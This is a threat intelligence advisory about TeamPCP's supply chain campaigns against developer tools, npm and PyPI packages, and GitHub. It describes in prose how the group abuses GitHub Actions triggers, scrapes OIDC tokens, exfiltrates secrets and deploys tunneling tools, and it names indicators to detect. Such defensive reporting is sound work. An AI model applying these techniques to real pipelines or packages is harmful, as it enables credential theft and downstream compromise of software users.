[CS-SA-26-0701] TeamPCP Software Supply Chain Campaigns

CRITICALSTART® Cyber Research Unit (CRU)
July 3, 2026
18 min read
Cyber Threat Intelligence

CRITICALSTART® Security Advisory

TLP CLEAR // [CS-SA-26-0701] TeamPCP Software Supply Chain Campaigns

TLP:CLEAR

Executive Summary

On July 2, 2026, the Federal Bureau of Investigation (FBI) released a FLASH report on TeamPCP tactics, techniques, procedures (TTPs), and indicators of compromise (IOCs), reflecting sustained federal law enforcement attention to the group's activity.[1] This advisory incorporates that report alongside findings from 16 additional independent industry, government, and press sources into a single consolidated analysis for security teams and leadership.

The CRITICALSTART® Cyber Research Unit (CRU) is tracking TeamPCP, a financially motivated threat actor conducting a sustained campaign of software supply chain compromises across widely used developer and security tools. The campaign began with the compromise of Aqua Security Trivy in March 2026 and has since expanded to Checkmarx KICS, LiteLLM, the Telnyx Python software development kit (SDK), and several additional packages across the GitHub Actions, npm, PyPI, Docker Hub, and OpenVSX ecosystems.[1, 2]

TeamPCP gains initial access primarily through compromised continuous integration and continuous delivery (CI/CD) credentials and misconfigured GitHub Actions triggers, then leverages stolen tokens to poison additional packages in a self-perpetuating cycle. Confirmed impact includes theft of cloud access tokens, Secure Shell (SSH) keys, and Kubernetes secrets from affected environments.[1] Independent research places the campaign's scale at over 1,000 affected software-as-a-service (SaaS) environments, approximately 500,000 stolen credentials, and more than 300 gigabytes (GB) of exfiltrated data, spanning at least 20 distinct attack waves through May 2026.[6, 9, 14] The campaign escalated further in May 2026 with a self-propagating worm known as Mini Shai-Hulud, which compromised the TanStack ecosystem and more than 170 additional npm and PyPI packages, and culminated in TeamPCP's claimed and subsequently confirmed breach of GitHub's own internal source code repositories.[11, 12, 15, 16] Organizations that use any of the affected packages, or that rely on GitHub Actions workflows with the pull_request_target trigger, should treat this as an active and ongoing threat rather than a closed incident.[3] Critical Start recommends immediate credential rotation, GitHub Actions hardening, and the detection and response actions outlined in this advisory.

Background

TeamPCP is a financially-motivated threat actor, also tracked under the aliases PCPcat, ShellForce, DeadCatx3, and CipherForce.[1, 3] The group first surfaced in late 2025 conducting cloud-native exploitation against exposed Docker application programming interfaces (APIs) and Kubernetes clusters, and it also has roots in cryptocurrency mining and theft before pivoting toward large-scale software supply chain compromise.[3]

The most impactful technique in TeamPCP's toolkit abuses GitHub Actions configurations within victim CI/CD pipelines.[3] Specifically, the group has repeatedly exploited weaknesses associated with the pull_request_target trigger, a GitHub Actions feature that allows workflows triggered by a pull request from a fork to run with the permissions and secrets of the original repository rather than the fork. Security researchers refer to abuse of this trigger as a "Pwn Request," a term GitHub itself has warned about in security advisories issued in 2021 and again in 2025.[3]

The current wave of the campaign began on March 19, 2026, when TeamPCP compromised the aqua-bot service account associated with Aqua Security's Trivy vulnerability scanner and executed an imposter commit attack, force-pushing malicious code to 76 of 77 version tags in the aquasecurity/trivy-action repository and to all tags in aquasecurity/setup-trivy.[2] This initial compromise was made possible by an incomplete credential rotation following a smaller breach disclosed in late February 2026, illustrating how partial remediation of an earlier incident enabled a far larger follow-on compromise.[2] Two days later, on March 21, 2026, TeamPCP used stolen GitHub personal access tokens (PATs) harvested from the Trivy compromise to target Checkmarx KICS, an infrastructure-as-code (IaC) scanner, force-pushing malicious commits to 35 version tags of the checkmarx/kics-github-action repository.[2] This pattern — using credentials stolen from one compromised tool to poison the next — is the defining operational signature of the campaign and is consistent with the FBI's assessment that exfiltrated data and credentials should be treated as a persistent, long-term risk rather than a one-time exposure event.[1, 2]

In May 2026, TeamPCP claimed to have breached GitHub's own internal source code repositories, reportedly accessing several thousand repositories after a GitHub employee installed a poisoned Visual Studio Code extension. GitHub confirmed the compromise and stated that the exposed material consisted of GitHub's own internal code rather than customer data.[4, 15, 16] Independent reporting on the incident places it within the broader arc of TeamPCP's campaign, in which each compromised environment has repeatedly yielded the credentials needed to reach the next target.[4]

Threat Actor Network

TeamPCP operates a public-facing presence on Telegram across two channels, which grew from roughly 700 subscribers in early February 2026 to over 1,180 by late March, driven largely by media coverage of the group's supply chain operations.[6] The group does not appear to operate as a standalone actor. On BreachForums, TeamPCP formally announced a partnership with the Vect Ransomware Group, an emerging ransomware-as-a-service operation offering affiliates an 80% to 88% profit share, under which Vect deploys ransomware against organizations already compromised through TeamPCP's supply chain intrusions.[6] TeamPCP simultaneously runs CipherForce as a parallel ransomware operation, creating a dual-track extortion model, and a Lapsus$ collaboration has been reported but is not independently confirmed.[6]

Attribution across the campaign's many waves is assessed with medium-high confidence. Trend Micro tracks the activity cluster internally as SHADOW-WATER-058 and bases attribution on consistent infrastructure, tooling, and operational markers observed across waves, including a shared cipher seed embedded in the LiteLLM, Xinference, and elementary-data payloads.[7] A self-identification by the group, posted to social media following the Checkmarx KICS incident, aligned with the cluster name researchers were already using internally.[7] TeamPCP should not be conflated with every open-source supply chain incident reported in 2026. Independent researchers have specifically distinguished TeamPCP from the unrelated GhostClaw campaign, which uses different infrastructure and npm typosquatting rather than CI/CD credential theft, and have confirmed that at least one unrelated source code disclosure was caused by an accidental build error rather than TeamPCP activity. Analysts should verify attribution against the indicators in this advisory before assuming a given incident is TeamPCP's work.

Attack Methodology and Techniques

TeamPCP's operational approach combines credential harvesting, sophisticated command and control infrastructure, and modular malware families to achieve lateral movement across victim environments. The group's tactics evolved from direct repository poisoning to advanced supply chain attacks that leverage CI/CD pipelines, container infrastructure, and self-propagating worms. The following subsections provide details.

Credential Theft and Force-Push Compromise

TeamPCP's payloads are designed to harvest the broadest possible range of developer and cloud secrets, including cloud access tokens, Secure Shell (SSH) keys, Kubernetes secrets, package registry publishing tokens, and Git credentials.[1] Early payload variants extracted Amazon Web Services (AWS), Google Cloud Platform (GCP), and Microsoft Azure credentials directly from a compromised endpoint's instance metadata service.[2] Later variants evolved into a modular loader architecture that pulled second-stage payloads on demand, and ultimately into a self-replicating worm with wiper components capable of scanning for exposed Docker APIs and harvesting SSH keys across a local subnet.[2]

Command and Control Infrastructure

TeamPCP has used both traditional and decentralized command and control (C2) infrastructure. One wave relied on the typosquat domain checkmarx[.]zone for exfiltration, while other waves adopted an Internet Computer Protocol (ICP) blockchain canister as a censorship-resistant dead-drop, an approach that removes any single point of takedown for defenders.[2] As a fallback exfiltration channel, the malware has used a victim's own GitHub token to create a hidden repository (commonly named docs-tpcp or tpcp-docs) within the victim's own GitHub organization, allowing data theft to blend into ordinary repository activity.[1, 2]

Malware Deployed by TeamPCP

  • CanisterWorm: harvests cloud access tokens, credentials, application programming interface (API) keys, and other authentication material tied to AWS, GCP, and Azure, and includes wiper components for destructive follow-on activity.[1, 2]
  • SANDCLOCK: a credential-stealing tool that extracts AWS credentials, Kubernetes ServiceAccount tokens, local environment variables, and cryptocurrency wallet data.[1]
  • Mini Shai-Hulud: a self-replicating, cross-ecosystem worm that propagates across npm and PyPI by publishing infected package versions using stolen publishing tokens.[1]
  • Miasma: a Mini Shai-Hulud variant that self-propagates across open-source registries, harvesting credentials and poisoning configuration files.[1]

TeamPCP has also engaged in extortion and reported collaboration with other cybercriminal groups, including publishing victim names on a public leak site and threatening the disclosure of stolen data.[1]

Container and Cloud Lateral Movement

Beyond direct package poisoning, TeamPCP conducts container and Kubernetes compromise using a familiar but effective pattern: downloading and immediately executing a script through a shell pipeline to gain execution while avoiding file creation on disk.[8] Once stable execution is achieved, the actor deploys tunneling and proxy tooling, including frps and gost, to expose internal services and convert compromised containers into reusable infrastructure for pivoting into other environments.[8] TeamPCP has also been observed exploiting the React2Shell vulnerability directly against exposed web servers to gain shell access outside of containerized workloads, expanding the attack surface beyond Kubernetes and CI/CD environments alone.[8]

The Mini Shai-Hulud Worm and the May 2026 GitHub Breach

Worm Mechanics and Provenance Abuse

On May 11, 2026, TeamPCP introduced a new self-propagating payload under the name Mini Shai-Hulud. For this wave, the actor exploited a pull request workflow misconfiguration in the TanStack open-source project's GitHub Actions continuous integration (CI) pipeline: a pull request from a fork triggered a workflow with write access to the base repository's build cache, and the poisoned cache was executed roughly eight hours later when a legitimate maintainer merge triggered the standard release workflow.[11] The worm then scraped an OpenID Connect (OIDC) token directly from the GitHub Actions runner's memory and exchanged it for npm publishing credentials through npm's own token exchange endpoint, meaning no token was "stolen" in the traditional sense and the publish workflow itself did not appear compromised.[11]

This mechanism allowed the resulting malicious packages to carry valid Supply-chain Levels for Software Artifacts (SLSA) Build Level 3 provenance attestations, making this the first documented npm worm confirmed to produce validly attested malicious packages.[12] SLSA provenance confirms which pipeline produced an artifact, not whether that pipeline behaved as intended, and a compromised build step can therefore still produce an artifact that passes standard provenance verification.[12] The wave ultimately affected more than 170 packages across the TanStack, UiPath, Mistral AI, OpenSearch, and Guardrails AI namespaces, and the worm's marker repositories, commit branch names, and encryption artifacts consistently referenced Frank Herbert's Dune novels.[12]

On May 12, 2026, TeamPCP publicly released what independent analysis confirmed to be the complete source code of the Shai-Hulud offensive framework on GitHub, with a README crediting the group directly.[13] The released framework is a modular toolkit for credential harvesting, supply chain poisoning, and encrypted data exfiltration, and its public availability means the same techniques can now be studied, adapted, and reused by other threat actors beyond TeamPCP.[13] Researchers have noted that the compromised TanStack packages alone, such as @tanstack/react-router, represent load-bearing infrastructure consumed directly and transitively across large portions of the JavaScript ecosystem.[14]

The GitHub Internal Breach

One of the credentials harvested during the May Mini Shai-Hulud wave belonged to a TanStack contributor whose access chained through to publishing credentials for the Nx Console Visual Studio Code extension. TeamPCP used this access to poison the extension, and a GitHub employee who installed the compromised version had their device compromised as a result.[15, 16] GitHub subsequently confirmed that the resulting activity involved exfiltration of GitHub-internal repositories, stating that the attacker's claim of approximately 3,800 repositories was directionally consistent with its own investigation, and that the exposed material consisted of GitHub's own code rather than customer data.[15, 16]

TeamPCP subsequently advertised GitHub's source code and internal organizations for sale on BreachForums for an asking price of no less than $50,000, and later announced a joint sale of the same material with the Lapsus$ group for $95,000, stating that the data would be leaked for free if no buyer emerged.[15] This incident illustrates that TeamPCP's downstream risk is not limited to organizations that directly consume the packages it has poisoned; a compromised developer tool anywhere in the supply chain, including code editor extensions, can provide a path into an upstream platform provider itself.

MITRE ATT&CK Technique Mapping

The following table maps TeamPCP's observed tactics and techniques to the MITRE ATT&CK framework, enabling security teams to correlate the group's activity with detection rules, threat models, and response procedures already in use across their infrastructure.

Technique ID Name Description
T1195.001 Compromise Software Dependencies and Development Tools TeamPCP force-pushed malicious commits to trusted repositories including Trivy, KICS, LiteLLM, and Telnyx, poisoning downstream software before it reached victim environments.
T1078 Valid Accounts Initial access to Trivy and KICS was achieved using a compromised service account (aqua-bot) and stolen GitHub personal access tokens rather than exploitation of a software flaw.
T1552 Unsecured Credentials Malware harvested cloud access tokens, SSH keys, Kubernetes secrets, and environment variables directly from CI/CD runners and compromised endpoints.
T1567 Exfiltration Over Web Service Stolen data was exfiltrated to typosquat domains, decentralized ICP canister infrastructure, and hidden repositories created within victim GitHub organizations.
T1485 Data Destruction CanisterWorm incorporates wiper components alongside its credential-harvesting functionality.
T1090 Proxy Tunneling tools frps and gost were deployed inside compromised containers to expose internal services and pivot into additional environments.
T1027 Obfuscated Files or Information Mini Shai-Hulud payloads such as router_init.js were obfuscated to profile the execution environment before launching credential-stealing functionality.

Vulnerability Context

The FBI FLASH report lists four CVE identifiers associated with the TeamPCP campaign.[1] CVE-2025-55182, also known as React2Shell, is not itself a supply chain flaw but is included because TeamPCP's predecessor operations used it for initial cloud access before the group pivoted to supply chain compromise.

CVE CVSS Relevance
CVE-2026-33634 8.8 Embedded malicious code in Aqua Security Trivy, delivered via a compromised service account and force-pushed version tags.
CVE-2026-45321 9.6 Supply chain compromise of TanStack npm packages via the Mini Shai-Hulud worm, using hijacked GitHub Actions OpenID Connect (OIDC) tokens.
CVE-2026-48027 9.8 Associated with a downstream package compromise linked to the broader TeamPCP campaign per FBI reporting.
CVE-2025-55182 10.0 React2Shell, an unauthenticated remote code execution flaw in React Server Components, exploited during TeamPCP's earlier cloud exploitation operations.

Implications for Organizations

Any organization that has installed an affected version of Trivy, KICS, LiteLLM, the Telnyx SDK, or a downstream package during the exposure windows described in this advisory should assume that any secret accessible to the affected CI/CD pipeline has been exposed. Because TeamPCP's model depends on chaining stolen credentials from one compromise into the next, a single unrotated token can allow the actor to regain access even after the initially affected package has been patched or removed.[1, 2]

The exploitation of the pull_request_target trigger means that organizations maintaining open-source projects, or consuming packages that do so, carry risk that extends beyond their own direct dependencies. Long-lived, broadly scoped GitHub Actions tokens are the single largest amplifying factor in the campaign's reach.[3]

The May 2026 GitHub breach demonstrates that this risk extends to platform providers themselves: a single compromised code editor extension on one employee device led to the exfiltration of thousands of internal repositories.[15, 16] Organizations should also account for downstream monetization risk. TeamPCP's confirmed partnership with the Vect ransomware group means that credentials and access harvested during a supply chain compromise may resurface weeks or months later as a ransomware intrusion rather than remaining a pure credential theft event.[6] Removing or patching an affected package does not remediate this campaign on its own. Credentials accessible to the compromised pipeline during the exposure window must be rotated, or the actor can regain access through previously stolen tokens.

Prioritized Mitigation Strategies

To improve your organization's security posture in light of the TeamPCP threat, we recommend the following:

Immediate (Within 24 Hours)

  • Rotate all CI/CD secrets, publishing tokens, and cloud credentials accessible to pipelines during the exposure windows in this advisory.
  • Search GitHub organization repositories for tpcp-docs or docs-tpcp repositories, which indicate exfiltration.
  • Pin all GitHub Actions workflows to verified commit SHA hashes rather than floating tags or branches.
  • Audit developer workstations for the Nx Console Visual Studio Code extension and other IDE extensions installed outside centrally managed channels.

Short-Term (Within Two Weeks)

  • Require phishing-resistant MFA (passkeys or hardware keys) for all accounts with code repository or package publishing access.
  • Remove the pull_request_target trigger from GitHub Actions workflows unless strictly required.
  • Deploy runtime monitoring for CI/CD pipelines to detect unexpected outbound connections and tunneling tools (frps, gost).
  • Audit npm and PyPI package maintainer recovery email addresses for stale or expired domains.
  • Require code review approvals and signed commits before merging to protected branches.[3]
  • Adopt Sigstore-aware provenance verification rather than relying on SLSA attestation alone.[12]

What Critical Start is Doing

The CRITICALSTART® Cyber Research Unit (CRU) continues to monitor and report on TeamPCP and related threat activities while working closely with the Security Operations Center (SOC) and Security Engineering team to implement any relevant detections and increase vigilance. For future updates, CRU will post updates via Cyber Operations Risk & Response™ Bulletins and on the CRITICALSTART® Intelligence Hub.

Conclusion

TeamPCP has demonstrated a sustained ability to convert compromised developer and security tooling into a self-perpetuating credential theft operation, a pattern confirmed independently by federal law enforcement, industry researchers, and press investigation.[1, 2, 6, 15] The group's operational model, which relies on using stolen credentials from one compromised tool to poison the next, means that patching a single affected package does not close the exposure; the actor can regain access through previously exfiltrated tokens weeks or months after initial discovery. This pattern, combined with TeamPCP's confirmed partnership with ransomware operators and its demonstrated capability to reach platform providers themselves via compromised developer tooling, establishes a risk profile that extends far beyond the tools currently public.[6, 15, 16]

Organizations that use any affected package, or that maintain GitHub Actions workflows with the pull_request_target trigger, should rotate credentials and apply the recommendations in this advisory without delay. More broadly, the security engineering and DevOps teams responsible for open-source consumption and CI/CD pipeline management should treat this campaign as a sustained, ongoing threat and adjust their supply chain risk models accordingly. Defenders should remain vigilant for any attempt to exploit similar credential chains, whether in their direct dependencies or several layers removed, and should maintain liaison relationships with law enforcement and peer security teams to ensure rapid dissemination of new indicators as the campaign evolves.

Further Reading

  1. [1]Federal Bureau of Investigation and Cybersecurity and Infrastructure Security Agency, "Cyber Criminal Group TeamPCP," FLASH-20260702-01, Jul. 2, 2026. [Online]. Available: https://www.ic3.gov/CSA/2026/260702.pdf
  2. [2]Palo Alto Networks Unit 42, "Weaponizing the Protectors: TeamPCP's Multi-Stage Supply Chain Attack on Security Infrastructure," Apr. 9, 2026. [Online]. Available: https://unit42.paloaltonetworks.com/teampcp-supply-chain-attacks/
  3. [3]Okta Threat Intelligence, "Defending against TeamPCP software supply chain attacks," May 18, 2026. [Online]. Available: https://www.okta.com/ko-kr/blog/threatintelligence/defending_against_team_pcp_software_supply_chain_attacks/
  4. [4]WIRED, "TeamPCP's Software Supply Chain Attack Spree on GitHub," May 2026. [Online]. Available: https://www.wired.com/story/teampcp-software-supply-chain-attack-spree-github/
  5. [5]Malpedia, "TeamPCP (Threat Actor)," Fraunhofer FKIE, May 22, 2026. [Online]. Available: https://malpedia.caad.fkie.fraunhofer.de/actor/teampcp
  6. [6]SOCRadar, "Dark Web Profile: TeamPCP," Apr. 9, 2026. [Online]. Available: https://socradar.io/blog/dark-web-profile-teampcp/
  7. [7]Trend Micro, "Analyzing TeamPCP's Supply Chain Attacks: Checkmarx KICS and elementary-data in CI/CD Credential Theft," May 13, 2026. [Online]. Available: https://www.trendmicro.com/en_us/research/26/e/analyzing-teampcp-supply-chain-attacks.html
  8. [8]Elastic Security Labs, "Linux & Cloud Detection Engineering: TeamPCP Container Attack Scenario," Mar. 20, 2026. [Online]. Available: https://www.elastic.co/security-labs/teampcp-container-attack-scenario
  9. [9]Wiz, "The Worm That Keeps on Digging: TeamPCP Hits @antv in Latest Wave," May 19, 2026. [Online]. Available: https://www.wiz.io/blog/mini-shai-hulud-teampcp-hits-antv-supply-chain
  10. [10]Endor Labs, "TeamPCP Isn't Done: Threat Actor Behind Trivy and KICS Compromises Now Hits LiteLLM's 95 Million Monthly Downloads on PyPI," Mar. 30, 2026. [Online]. Available: https://www.endorlabs.com/learn/teampcp-isnt-done
  11. [11]Akamai, "Mini Shai-Hulud: The Worm Returns and Goes Public," May 15, 2026. [Online]. Available: https://www.akamai.com/blog/security-research/mini-shai-hulud-worm-returns-goes-public
  12. [12]StepSecurity, "TeamPCP's Mini Shai-Hulud Is Back: A Self-Spreading Supply Chain Attack Compromises TanStack npm Packages," May 10, 2026. [Online]. Available: https://www.stepsecurity.io/blog/mini-shai-hulud-is-back-a-self-spreading-supply-chain-attack-hits-the-npm-ecosystem
  13. [13]Datadog Security Labs, "Shai-Hulud Goes Open Source," May 13, 2026. [Online]. Available: https://securitylabs.datadoghq.com/articles/shai-hulud-open-source-framework-static-analysis/
  14. [14]ReversingLabs, "Team PCP's Mini Shai-Hulud Tears at Open-Source Trust," May 19, 2026. [Online]. Available: https://www.reversinglabs.com/blog/mini-shai-hulud-tears-at-oss-trust
  15. [15]The Hacker News, "GitHub Breached: Employee Device Hack Led to Exfiltration of 3,800+ Internal Repos," May 20, 2026. [Online]. Available: https://thehackernews.com/2026/05/github-investigating-teampcp-claimed.html
  16. [16]Help Net Security, "TeamPCP Breached GitHub's Internal Codebase via Poisoned VS Code Extension," May 21, 2026. [Online]. Available: https://www.helpnetsecurity.com/2026/05/20/github-breached-teampcp/
  17. [17]ramimac.me, "Incident Timeline: TeamPCP Supply Chain Campaign," Mar. 19, 2026 (continually updated). [Online]. Available: https://ramimac.me/teampcp/